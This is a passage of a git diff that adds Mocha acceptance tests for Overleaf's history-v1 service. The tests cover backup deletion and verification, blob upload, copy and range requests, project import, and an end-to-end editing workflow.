} + ) + ) + jobs.push( + backupPersistor.sendStream( + chunksBucket, + projectKey.format(historyId) + '/111', + Stream.Readable.from(['chunk 1']), + { contentLength: 7 } + ) + ) + jobs.push( + backupPersistor.sendStream( + chunksBucket, + projectKey.format(historyId) + '/222', + Stream.Readable.from(['chunk 2']), + { contentLength: 7 } + ) + ) + } + await Promise.all(jobs) + }) + + it('renders 401 without auth', async function () { + const response = await fetch( + testServer.testUrl('/project/000000000000000000000042/backup'), + { method: 'DELETE' } + ) + expect(response.status).to.equal(401) + expect(response.headers.get('www-authenticate')).to.match(/^Basic/) + }) + + it('returns 422 when not deleted', async function () { + const response = await deleteProject(projectIdNonDeleted) + expect(response.status).to.equal(422) + expect(await response.text()).to.equal( + 'refusing to delete non-deleted project' + ) + await expectToHaveBackup(projectIdNonDeleted) + }) + it('returns 422 when not expired', async function () { + const response = await deleteProject(projectIdNonExpired) + expect(response.status).to.equal(422) + expect(await response.text()).to.equal( + 'refusing to delete non-expired project' + ) + await expectToHaveBackup(projectIdNonExpired) + }) + it('returns 422 when live-history not deleted', async function () { + const response = await deleteProject(projectIdWithChunks) + expect(response.status).to.equal(422) + expect(await response.text()).to.equal( + 'refusing to delete project with remaining chunks' + ) + await expectToHaveBackup(projectIdWithChunks) + }) + it('returns 422 when historyId is unknown', async function () { + const response = await deleteProject(projectIdNoHistoryId) + expect(response.status).to.equal(422) + expect(await response.text()).to.equal( + 'refusing to delete project with unknown historyId' + ) + await expectToHaveBackup(projectIdNoHistoryId) + }) + it('should successfully delete postgres id', async function () { + await expectToHaveBackup(postgresHistoryId) + const response = await deleteProject(projectIdPostgres) + expect(response.status).to.equal(204) + await expectToHaveNoBackup(postgresHistoryId) + }) + it('should successfully delete mongo id', async function () { + await expectToHaveBackup(projectIdMongoDB) + const response = await deleteProject(projectIdMongoDB) + expect(response.status).to.equal(204) + await expectToHaveNoBackup(projectIdMongoDB) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/api/backupVerifier.test.mjs b/services/history-v1/test/acceptance/js/api/backupVerifier.test.mjs new file mode 100644 index 0000000..1fe09f4 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/backupVerifier.test.mjs @@ -0,0 +1,375 @@ +// @ts-check +import cleanup from '../storage/support/cleanup.js' +import fetch from 'node-fetch' +import testServer from './support/test_backup_verifier_server.mjs' +import { expect } from 'chai' +import testProjects from './support/test_projects.js' +import { + backupPersistor, + chunksBucket, + projectBlobsBucket, +} from '../../../../storage/lib/backupPersistor.mjs' +import { + BlobStore, + makeProjectKey, +} from '../../../../storage/lib/blob_store/index.js' +import Stream from 'node:stream' +import * as zlib from 'node:zlib' +import { promisify } from 'node:util' +import { execFile } from 'node:child_process' +import { NotFoundError } from '@overleaf/object-persistor/src/Errors.js' +import { chunkStore } from '../../../../storage/index.js' +import { Change, File, Operation } from 'overleaf-editor-core' +import Crypto from 'node:crypto' +import path from 'node:path' +import projectKey from '../../../../storage/lib/project_key.js' +import { historyStore } from '../../../../storage/lib/history_store.js' + +/** + * @typedef {import("node-fetch").Response} Response + * @typedef {import("overleaf-editor-core").Blob} Blob + */ + +async function verifyProjectScript(historyId, expectFail = true) { + try { + const result = await promisify(execFile)( + process.argv0, + ['storage/scripts/verify_project.mjs', `--historyId=${historyId}`], + { + encoding: 'utf-8', + timeout: 5_000, + env: { + ...process.env, + LOG_LEVEL: 'warn', + }, + } + ) + return { status: 0, stdout: result.stdout, stderr: result.stderr } + } catch (err) { + if ( + err && + typeof err === 'object' && + 'stdout' in err && + 'code' in err && + 'stderr' in err + ) { + if (!expectFail) { + console.log(err) + } + return { + stdout: typeof err.stdout === 'string' ? err.stdout : '', + status: typeof err.code === 'number' ? err.code : -1, + stderr: typeof err.stdout === 'string' ? err.stderr : '', + } + } + throw err + } +} + +/** + * @param {string} historyId + * @param {string} hash + * @return {Promise<{stdout: string, status:number }>} + */ +async function verifyBlobScript(historyId, hash, expectFail = true) { + try { + const result = await promisify(execFile)( + process.argv0, + [ + 'storage/scripts/verify_backup_blob.mjs', + `--historyId=${historyId}`, + hash, + ], + { + encoding: 'utf-8', + timeout: 5_000, + env: { + ...process.env, + LOG_LEVEL: 'warn', + }, + } + ) + return { status: 0, stdout: result.stdout } + } catch (err) { + if (err && typeof err === 'object' && 'stdout' in err && 'code' in err) { + if (!expectFail) { + console.log(err) + } + return { + stdout: typeof err.stdout === 'string' ? err.stdout : '', + status: typeof err.code === 'number' ? err.code : -1, + } + } + throw err + } +} +/** + * @param {string} historyId + * @param {string} hash + * @return {Promise<Response>} + */ +async function verifyBlobHTTP(historyId, hash) { + return await fetch( + testServer.testUrl(`/history/${historyId}/blob/${hash}/verify`), + { method: 'GET' } + ) +} + +async function backupChunk(historyId) { + const newChunk = await chunkStore.loadLatestRaw(historyId) + const { buffer: chunkBuffer } = await historyStore.loadRawWithBuffer( + historyId, + newChunk.id + ) + const md5 = Crypto.createHash('md5').update(chunkBuffer) + await backupPersistor.sendStream( + chunksBucket, + path.join( + projectKey.format(historyId), + projectKey.pad(newChunk.startVersion) + ), + Stream.Readable.from([chunkBuffer]), + { + contentType: 'application/json', + contentEncoding: 'gzip', + contentLength: chunkBuffer.byteLength, + sourceMd5: md5.digest('hex'), + } + ) +} + +const FIFTEEN_MINUTES_IN_MS = 900_000 + +async function addFileInNewChunk( + fileContents, + filePath, + historyId, + { creationDate = new Date() } +) { + const chunk = await chunkStore.loadLatest(historyId) + const operation = Operation.addFile( + `${historyId}.txt`, + File.fromString(fileContents) + ) + const changes = [new Change([operation], creationDate, [])] + chunk.pushChanges(changes) + await chunkStore.update(historyId, 0, chunk) +} + +/** + * @param {string} historyId + * @param {Object} [backup] + * @return {Promise<string>} + */ +async function prepareProjectAndBlob( + historyId, + { shouldBackupBlob, shouldBackupChunk, shouldCreateChunk } = { + shouldBackupBlob: true, + shouldBackupChunk: true, + shouldCreateChunk: true, + } +) { + await testProjects.createEmptyProject(historyId) + const blobStore = new BlobStore(historyId) + const fileContents = historyId + const blob = await blobStore.putString(fileContents) + if (shouldCreateChunk) { + await addFileInNewChunk(fileContents, `${historyId}.txt`, historyId, { + creationDate: new Date(new Date().getTime() - FIFTEEN_MINUTES_IN_MS), + }) + } + + if (shouldBackupBlob) { + const gzipped = zlib.gzipSync(Buffer.from(historyId)) + await backupPersistor.sendStream( + projectBlobsBucket, + makeProjectKey(historyId, blob.getHash()), + Stream.Readable.from([gzipped]), + { contentLength: gzipped.byteLength, contentEncoding: 'gzip' } + ) + await checkDEKExists(historyId) + } + if (shouldCreateChunk && shouldBackupChunk) { + await backupChunk(historyId) + } + + return blob.getHash() +} + +/** + * @param {string} historyId + * @return {Promise<void>} + */ +async function checkDEKExists(historyId) { + await backupPersistor.forProjectRO( + projectBlobsBucket, + makeProjectKey(historyId, '') + ) +} + +describe('backupVerifier', function () { + const historyIdPostgres = '42' + const historyIdMongo = '000000000000000000000042' + let blobHashPG, blobHashMongo, blobPathPG + + beforeEach(cleanup.everything) + beforeEach('create health check projects', async function () { + ;[blobHashPG, blobHashMongo] = await Promise.all([ + prepareProjectAndBlob('42'), + prepareProjectAndBlob('000000000000000000000042'), + ]) + blobPathPG = makeProjectKey(historyIdPostgres, blobHashPG) + }) + beforeEach(testServer.listenOnRandomPort) + + it('renders 200 on /status', async function () { + const response = await fetch(testServer.testUrl('/status')) + expect(response.status).to.equal(200) + }) + + it('renders 200 on /health_check', async function () { + const response = await fetch(testServer.testUrl('/health_check')) + expect(response.status).to.equal(200) + }) + describe('storage/scripts/verify_project.mjs', function () { + describe('when the project is appropriately backed up', function () { + it('should return 0', async function () { + const response = await verifyProjectScript(historyIdPostgres, false) + expect(response.status).to.equal(0) + }) + }) + describe('when the project chunk is not backed up', function () { + let response + beforeEach(async function () { + await prepareProjectAndBlob('000000000000000000000043', { + shouldBackupChunk: false, + shouldBackupBlob: true, + shouldCreateChunk: true, + }) + response = await verifyProjectScript('000000000000000000000043') + }) + it('should return 1', async function () { + expect(response.status).to.equal(1) + }) + it('should emit an error message referring to a missing chunk', async function () { + const stderr = response.stderr + expect(stderr).to.include('BackupRPOViolationChunkNotBackedUpError') + }) + }) + describe('when a project blob is not backed up', function () { + let response + beforeEach(async function () { + await prepareProjectAndBlob('43', { + shouldBackupChunk: true, + shouldBackupBlob: false, + shouldCreateChunk: true, + }) + response = await verifyProjectScript('43') + }) + + it('should return 1', function () { + expect(response.status).to.equal(1) + }) + + it('includes a BackupCorruptedError in stderr', function () { + expect(response.stderr).to.include( + 'BackupCorruptedMissingBlobError: missing blob' + ) + }) + }) + }) + describe('storage/scripts/verify_backup_blob.mjs', function () { + it('throws and does not create DEK if missing', async function () { + const historyId = '404' + const hash = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + const response = await verifyBlobScript(historyId, hash) + expect(response.status).to.equal(1) + expect(response.stdout).to.include('dek does not exist') + await expect(checkDEKExists(historyId)).to.be.rejectedWith(NotFoundError) + }) + it('throws when deleted in db', async function () { + const blobStore = new BlobStore(historyIdPostgres) + await blobStore.deleteBlobs() + const response = await verifyBlobScript(historyIdPostgres, blobHashPG) + expect(response.status).to.equal(1) + expect(response.stdout).to.include(`blob ${blobHashPG} not found`) + }) + it('throws when not existing', async function () { + await backupPersistor.deleteObject(projectBlobsBucket, blobPathPG) + const result = await verifyBlobScript(historyIdPostgres, blobHashPG) + expect(result.status).to.equal(1) + expect(result.stdout).to.include('missing blob') + }) + it('throws when corrupted', async function () { + await backupPersistor.sendStream( + projectBlobsBucket, + blobPathPG, + Stream.Readable.from(['something else']), + { contentLength: 14 } + ) + const result = await verifyBlobScript(historyIdPostgres, blobHashPG) + expect(result.status).to.equal(1) + expect(result.stdout).to.include('hash mismatch for backed up blob') + }) + it('should successfully verify from postgres', async function () { + const result = await verifyBlobScript( + historyIdPostgres, + blobHashPG, + false + ) + expect(result.status).to.equal(0) + expect(result.stdout.split('\n')).to.include('OK') + }) + it('should successfully verify from mongo', async function () { + const result = await verifyBlobScript( + historyIdMongo, + blobHashMongo, + false + ) + expect(result.status).to.equal(0) + expect(result.stdout.split('\n')).to.include('OK') + }) + }) + describe('GET /history/:historyId/blob/:hash/verify', function () { + it('returns 404 when deleted in db', async function () { + const blobStore = new BlobStore(historyIdPostgres) + await blobStore.deleteBlobs() + const response = await verifyBlobHTTP(historyIdPostgres, blobHashPG) + expect(response.status).to.equal(404) + expect(await response.text()).to.equal(`blob ${blobHashPG} not found`) + }) + it('returns 422 and does not create DEK if missing', async function () { + const historyId = '404' + const hash = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + const response = await verifyBlobHTTP(historyId, hash) + expect(response.status).to.equal(422) + expect(await response.text()).to.equal('dek does not exist') + await expect(checkDEKExists(historyId)).to.be.rejectedWith(NotFoundError) + }) + it('returns 422 when not existing', async function () { + await backupPersistor.deleteObject(projectBlobsBucket, blobPathPG) + const response = await verifyBlobHTTP(historyIdPostgres, blobHashPG) + expect(response.status).to.equal(422) + expect(await response.text()).to.equal('missing blob') + }) + it('returns 422 when corrupted', async function () { + await backupPersistor.sendStream( + projectBlobsBucket, + blobPathPG, + Stream.Readable.from(['something else']), + { contentLength: 14 } + ) + const response = await verifyBlobHTTP(historyIdPostgres, blobHashPG) + expect(response.status).to.equal(422) + expect(await response.text()).to.equal('hash mismatch for backed up blob') + }) + it('should successfully verify from postgres', async function () { + const response = await verifyBlobHTTP(historyIdPostgres, blobHashPG) + expect(response.status).to.equal(200) + }) + it('should successfully verify from mongo', async function () { + const response = await verifyBlobHTTP(historyIdMongo, blobHashMongo) + expect(response.status).to.equal(200) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/api/end_to_end.test.js b/services/history-v1/test/acceptance/js/api/end_to_end.test.js new file mode 100644 index 0000000..f3ad144 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/end_to_end.test.js @@ -0,0 +1,396 @@ +'use strict' + +const BPromise = require('bluebird') +const { expect } = require('chai') +const HTTPStatus = require('http-status') +const fetch = require('node-fetch') +const fs = BPromise.promisifyAll(require('node:fs')) + +const cleanup = require('../storage/support/cleanup') +const fixtures = require('../storage/support/fixtures') +const testFiles = require('../storage/support/test_files') +const testProjects = require('./support/test_projects') +const testServer = require('./support/test_server') + +const core = require('overleaf-editor-core') +const Change = core.Change +const ChunkResponse = core.ChunkResponse +const File = core.File +const Operation = core.Operation +const Snapshot = core.Snapshot +const TextOperation = core.TextOperation + +const blobHash = require('../../../../storage').blobHash + +describe('overleaf ot', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + this.timeout(10000) // it takes a while on Docker for Mac + + it('can use API', function () { + let client, downloadZipClient + + const basicAuthClient = testServer.basicAuthClient + return ( + testProjects + .createEmptyProject() + .then(projectId => { + return testServer + .createClientForProject(projectId) + .then(clientForProject => { + client = clientForProject + return testServer.createClientForDownloadZip(projectId) + }) + .then(clientForProject => { + downloadZipClient = clientForProject + return projectId + }) + }) + + // the project is currently empty + .then(projectId => { + return client.apis.Project.getLatestContent({ + project_id: projectId, + }).then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(0) + return projectId + }) + }) + + // upload a blob and add two files using it + .then(projectId => { + return fetch( + testServer.url( + `/api/projects/${projectId}/blobs/${testFiles.GRAPH_PNG_HASH}`, + { qs: { pathname: 'graph_1.png' } } + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('graph.png')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + const testFile = File.fromHash(testFiles.GRAPH_PNG_HASH) + + const change = new Change( + [ + Operation.addFile('graph_1.png', testFile), + Operation.addFile('graph_2.png', testFile), + ], + new Date() + ) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + end_version: 0, + return_snapshot: 'hashed', + changes: [change.toRaw()], + }) + }) + .then(() => projectId) + }) + + // get the new project state + .then(projectId => { + return client.apis.Project.getLatestContent({ + project_id: projectId, + }).then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(2) + const file0 = snapshot.getFile('graph_1.png') + expect(file0.getHash()).to.equal(testFiles.GRAPH_PNG_HASH) + const file1 = snapshot.getFile('graph_2.png') + expect(file1.getHash()).to.equal(testFiles.GRAPH_PNG_HASH) + return projectId + }) + }) + + // get the history + .then(projectId => { + return client.apis.Project.getLatestHistory({ + project_id: projectId, + }).then(response => { + const chunk = ChunkResponse.fromRaw(response.obj).getChunk() + const changes = chunk.getChanges() + expect(changes.length).to.equal(1) + const change0Timestamp = changes[0].getTimestamp().getTime() + expect(change0Timestamp).to.be.closeTo(Date.now(), 1e4) + return projectId + }) + }) + + // upload an empty file + .then(projectId => { + return fetch( + testServer.url( + `/api/projects/${projectId}/blobs/${File.EMPTY_FILE_HASH}`, + { qs: { pathname: 'main.tex' } } + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + + const change = new Change( + [Operation.addFile('main.tex', testFile)], + new Date() + ) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + end_version: 1, + return_snapshot: 'hashed', + changes: [change.toRaw()], + }) + }) + .then(() => projectId) + }) + + .then(projectId => { + // Fetch empty file blob + return client.apis.Project.getProjectBlob({ + project_id: projectId, + hash: File.EMPTY_FILE_HASH, + }) + .then(response => { + expect(response.headers['content-type']).to.equal( + 'application/octet-stream' + ) + return response.data.arrayBuffer() + }) + .then(buffer => { + expect(buffer).to.deep.equal(new ArrayBuffer(0)) + return projectId + }) + }) + + // get the history + .then(projectId => { + return client.apis.Project.getLatestHistory({ + project_id: projectId, + }).then(response => { + const chunk = ChunkResponse.fromRaw(response.obj).getChunk() + const changes = chunk.getChanges() + expect(changes.length).to.equal(2) + return projectId + }) + }) + + // get the new project state + .then(projectId => { + return client.apis.Project.getLatestContent({ + project_id: projectId, + }).then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(3) + expect(snapshot.getFile('graph_1.png').getHash()).to.equal( + testFiles.GRAPH_PNG_HASH + ) + expect(snapshot.getFile('graph_2.png').getHash()).to.equal( + testFiles.GRAPH_PNG_HASH + ) + expect(snapshot.getFile('main.tex').getContent()).to.equal('') + return projectId + }) + }) + + // edit the main file + .then(projectId => { + const change = new Change( + [ + Operation.editFile( + 'main.tex', + TextOperation.fromJSON({ textOperation: ['hello'] }) + ), + ], + new Date() + ) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + changes: [change.toRaw()], + end_version: 2, + return_snapshot: 'hashed', + }).then(response => { + expect(response.status).to.equal(HTTPStatus.CREATED) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(3) + expect(snapshot.getFile('graph_1.png').getHash()).to.equal( + testFiles.GRAPH_PNG_HASH + ) + expect(snapshot.getFile('graph_2.png').getHash()).to.equal( + testFiles.GRAPH_PNG_HASH + ) + expect(snapshot.getFile('main.tex').getHash()).to.equal( + blobHash.fromString('hello') + ) + return projectId + }) + }) + + // get the new project state + .then(projectId => { + return client.apis.Project.getLatestContent({ + project_id: projectId, + }).then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(3) + expect(snapshot.getFile('graph_1.png').getHash()).to.equal( + testFiles.GRAPH_PNG_HASH + ) + expect(snapshot.getFile('graph_2.png').getHash()).to.equal( + testFiles.GRAPH_PNG_HASH + ) + const mainFile = snapshot.getFile('main.tex') + expect(mainFile.getHash()).to.be.null + expect(mainFile.getContent()).to.equal('hello') + return projectId + }) + }) + + // edit the main file again + .then(projectId => { + const change = new Change( + [ + Operation.editFile( + 'main.tex', + TextOperation.fromJSON({ textOperation: [1, -4, 'i world'] }) + ), + ], + new Date() + ) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + changes: [change.toRaw()], + end_version: 3, + return_snapshot: 'hashed', + }).then(response => { + expect(response.status).to.equal(HTTPStatus.CREATED) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(3) + expect(snapshot.getFile('main.tex').getHash()).to.equal( + blobHash.fromString('hi world') + ) + return projectId + }) + }) + + // get the new project state + .then(projectId => { + return client.apis.Project.getLatestContent({ + project_id: projectId, + }).then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(3) + expect(snapshot.getFile('graph_1.png')).to.exist + expect(snapshot.getFile('graph_2.png')).to.exist + const mainFile = snapshot.getFile('main.tex') + expect(mainFile.getHash()).to.be.null + expect(mainFile.getContent()).to.equal('hi world') + return projectId + }) + }) + + // rename the text file + .then(projectId => { + const change = new Change( + [Operation.moveFile('main.tex', 'intro.tex')], + new Date() + ) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + changes: [change.toRaw()], + end_version: 4, + return_snapshot: 'hashed', + }).then(response => { + expect(response.status).to.equal(HTTPStatus.CREATED) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(3) + expect(snapshot.getFile('intro.tex').getHash()).to.equal( + blobHash.fromString('hi world') + ) + return projectId + }) + }) + + // get the new project state + .then(projectId => { + return client.apis.Project.getLatestContent({ + project_id: projectId, + }).then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(3) + expect(snapshot.getFile('graph_1.png')).to.exist + expect(snapshot.getFile('graph_2.png')).to.exist + const mainFile = snapshot.getFile('intro.tex') + expect(mainFile.getHash()).to.be.null + expect(mainFile.getContent()).to.equal('hi world') + return projectId + }) + }) + + // remove a graph + .then(projectId => { + const change = new Change( + [Operation.removeFile('graph_1.png')], + new Date() + ) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + changes: [change.toRaw()], + end_version: 5, + return_snapshot: 'hashed', + }).then(response => { + expect(response.status).to.equal(HTTPStatus.CREATED) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(2) + return projectId + }) + }) + + // get the new project state + .then(projectId => { + return client.apis.Project.getLatestContent({ + project_id: projectId, + }).then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(2) + expect(snapshot.getFile('graph_2.png')).to.exist + const mainFile = snapshot.getFile('intro.tex') + expect(mainFile.getHash()).to.be.null + expect(mainFile.getContent()).to.equal('hi world') + return projectId + }) + }) + + // download zip with project content + .then(projectId => { + return downloadZipClient.apis.Project.getZip({ + project_id: projectId, + version: 6, + }).then(response => { + expect(response.status).to.equal(HTTPStatus.OK) + const headers = response.headers + expect(headers['content-type']).to.equal('application/octet-stream') + expect(headers['content-disposition']).to.equal( + 'attachment; filename=project.zip' + ) + }) + }) + ) + }) +}) diff --git a/services/history-v1/test/acceptance/js/api/project_blobs.test.js b/services/history-v1/test/acceptance/js/api/project_blobs.test.js new file mode 100644 index 0000000..f2677e4 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/project_blobs.test.js @@ -0,0 +1,251 @@ +const { expect } = require('chai') +const config = require('config') +const fs = require('node:fs') +const fetch = require('node-fetch') +const HTTPStatus = require('http-status') + +const cleanup = require('../storage/support/cleanup') +const fixtures = require('../storage/support/fixtures') +const testFiles = require('../storage/support/test_files') +const testServer = require('./support/test_server') +const { expectHttpError } = require('./support/expect_response') + +const { globalBlobs } = require('../../../../storage/lib/mongodb.js') +const { + loadGlobalBlobs, +} = require('../../../../storage/lib/blob_store/index.js') + +describe('Project blobs API', function () { + const projectId = '123' + + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + let client + let token + before(async function () { + client = await testServer.createClientForProject(projectId) + token = testServer.createTokenForProject(projectId) + }) + + it('returns 404 if the blob is not found', async function () { + const testHash = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + await expectHttpError( + client.apis.Project.getProjectBlob({ + project_id: projectId, + hash: testHash, + }), + HTTPStatus.NOT_FOUND + ) + }) + + it('checks if file hash matches the hash parameter', async function () { + const testHash = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + const response = await fetch( + testServer.url(`/api/projects/${projectId}/blobs/${testHash}`), + { + method: 'PUT', + headers: { Authorization: `Bearer ${token}` }, + body: fs.createReadStream(testFiles.path('hello.txt')), + } + ) + expect(response.status).to.equal(HTTPStatus.CONFLICT) + + // check that it did not store the file + await expectHttpError( + client.apis.Project.getProjectBlob({ + project_id: projectId, + hash: testFiles.HELLO_TXT_HASH, + }), + HTTPStatus.NOT_FOUND + ) + }) + + it('rejects oversized files', async function () { + const testHash = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + const buffer = Buffer.alloc( + parseInt(config.get('maxFileUploadSize'), 10) + 1 + ) + const response = await fetch( + testServer.url(`/api/projects/${projectId}/blobs/${testHash}`), + { + method: 'PUT', + headers: { Authorization: `Bearer ${token}` }, + body: buffer, + } + ) + expect(response.status).to.equal(HTTPStatus.REQUEST_ENTITY_TOO_LARGE) + }) + + describe('with an existing blob', async function () { + let fileContents + + beforeEach(async function () { + fileContents = await fs.promises.readFile(testFiles.path('hello.txt')) + const response = await fetch( + testServer.url( + `/api/projects/${projectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ), + { + method: 'PUT', + headers: { Authorization: `Bearer ${token}` }, + body: fileContents, + } + ) + expect(response.ok).to.be.true + }) + + it('fulfills a request with a JWT header', async function () { + const response = await client.apis.Project.getProjectBlob({ + project_id: projectId, + hash: testFiles.HELLO_TXT_HASH, + }) + const responseText = await response.data.text() + expect(responseText).to.equal(fileContents.toString()) + }) + + it('fulfills a request with a token parameter', async function () { + const url = new URL( + testServer.url( + `/api/projects/${projectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ) + ) + url.searchParams.append('token', token) + const response = await fetch(url) + const payload = await response.text() + expect(payload).to.equal(fileContents.toString()) + }) + + it('supports range request', async function () { + const url = new URL( + testServer.url( + `/api/projects/${projectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ) + ) + url.searchParams.append('token', token) + const response = await fetch(url, { headers: { Range: 'bytes=0-4' } }) + const payload = await response.text() + expect(payload).to.equal(fileContents.toString().slice(0, 4)) + }) + + it('supports HEAD request', async function () { + const url = new URL( + testServer.url( + `/api/projects/${projectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ) + ) + url.searchParams.append('token', token) + const response = await fetch(url, { method: 'HEAD' }) + expect(response.headers.get('Content-Length')).to.equal( + testFiles.HELLO_TXT_BYTE_LENGTH.toString() + ) + const payload = await response.text() + expect(payload).to.have.length(0) + }) + + it('rejects an unautorized request', async function () { + const response = await fetch( + testServer.url( + `/api/projects/${projectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ) + ) + expect(response.status).to.equal(HTTPStatus.UNAUTHORIZED) + }) + + it('copies the blob to another project', async function () { + const targetProjectId = '456' + const targetClient = + await testServer.createClientForProject(targetProjectId) + const targetToken = testServer.createTokenForProject(targetProjectId) + const url = new URL( + testServer.url( + `/api/projects/${targetProjectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ) + ) + url.searchParams.append('copyFrom', projectId) + + const response = await fetch(url, { + method: 'POST', + headers: { Authorization: `Bearer ${targetToken}` }, + }) + expect(response.status).to.equal(HTTPStatus.CREATED) + + const newBlobResponse = await targetClient.apis.Project.getProjectBlob({ + project_id: targetProjectId, + hash: testFiles.HELLO_TXT_HASH, + }) + const newBlobResponseText = await newBlobResponse.data.text() + expect(newBlobResponseText).to.equal(fileContents.toString()) + }) + + it('skips copying a blob to another project if it already exists', async function () { + const targetProjectId = '456' + const targetClient = + await testServer.createClientForProject(targetProjectId) + const targetToken = testServer.createTokenForProject(targetProjectId) + + const fileContents = await fs.promises.readFile( + testFiles.path('hello.txt') + ) + const uploadResponse = await fetch( + testServer.url( + `/api/projects/${targetProjectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ), + { + method: 'PUT', + headers: { Authorization: `Bearer ${targetToken}` }, + body: fileContents, + } + ) + expect(uploadResponse.ok).to.be.true + + const url = new URL( + testServer.url( + `/api/projects/${targetProjectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ) + ) + url.searchParams.append('copyFrom', projectId) + + const response = await fetch(url, { + method: 'POST', + headers: { Authorization: `Bearer ${targetToken}` }, + }) + expect(response.status).to.equal(HTTPStatus.NO_CONTENT) + + const newBlobResponse = await targetClient.apis.Project.getProjectBlob({ + project_id: targetProjectId, + hash: testFiles.HELLO_TXT_HASH, + }) + const newBlobResponseText = await newBlobResponse.data.text() + expect(newBlobResponseText).to.equal(fileContents.toString()) + }) + }) + + describe('with a global blob', async function () { + before(async function () { + await globalBlobs.insertOne({ + _id: testFiles.STRING_A_HASH, + byteLength: 1, + stringLength: 1, + }) + await loadGlobalBlobs() + }) + + it('does not copy global blobs', async function () { + const targetProjectId = '456' + const targetToken = testServer.createTokenForProject(targetProjectId) + const url = new URL( + testServer.url( + `/api/projects/${targetProjectId}/blobs/${testFiles.STRING_A_HASH}` + ) + ) + url.searchParams.append('copyFrom', projectId) + + const response = await fetch(url, { + method: 'POST', + headers: { Authorization: `Bearer ${targetToken}` }, + }) + expect(response.status).to.equal(HTTPStatus.NO_CONTENT) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/api/project_import.test.js b/services/history-v1/test/acceptance/js/api/project_import.test.js new file mode 100644 index 0000000..216fb52 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/project_import.test.js @@ -0,0 +1,57 @@ +'use strict' + +const BPromise = require('bluebird') +const { expect } = require('chai') +const HTTPStatus = require('http-status') +const fetch = require('node-fetch') +const fs = BPromise.promisifyAll(require('node:fs')) + +const cleanup = require('../storage/support/cleanup') +const fixtures = require('../storage/support/fixtures') +const testFiles = require('../storage/support/test_files') +const testProjects = require('./support/test_projects') +const testServer = require('./support/test_server') + +const { Change, File, Operation } = require('overleaf-editor-core') + +describe('project import', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + it('skips generating the snapshot by default', async function () { + const basicAuthClient = testServer.basicAuthClient + const projectId = await testProjects.createEmptyProject() + + // upload an empty file + const response = await fetch( + testServer.url( + `/api/projects/${projectId}/blobs/${File.EMPTY_FILE_HASH}`, + { qs: { pathname: 'main.tex' } } + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + expect(response.ok).to.be.true + + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + const testChange = new Change( + [Operation.addFile('main.tex', testFile)], + new Date() + ) + + const importResponse = + await basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + end_version: 0, + changes: [testChange.toRaw()], + }) + + expect(importResponse.status).to.equal(HTTPStatus.CREATED) + expect(importResponse.obj).to.deep.equal({}) + }) +}) diff --git a/services/history-v1/test/acceptance/js/api/project_updates.test.js b/services/history-v1/test/acceptance/js/api/project_updates.test.js new file mode 100644 index 0000000..d670002 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/project_updates.test.js @@ -0,0 +1,853 @@ +const BPromise = require('bluebird') +const { expect } = require('chai') +const fs = BPromise.promisifyAll(require('node:fs')) +const HTTPStatus = require('http-status') +const fetch = require('node-fetch') + +const cleanup = require('../storage/support/cleanup') +const fixtures = require('../storage/support/fixtures') +const testFiles = require('../storage/support/test_files') +const expectResponse = require('./support/expect_response') +const testServer = 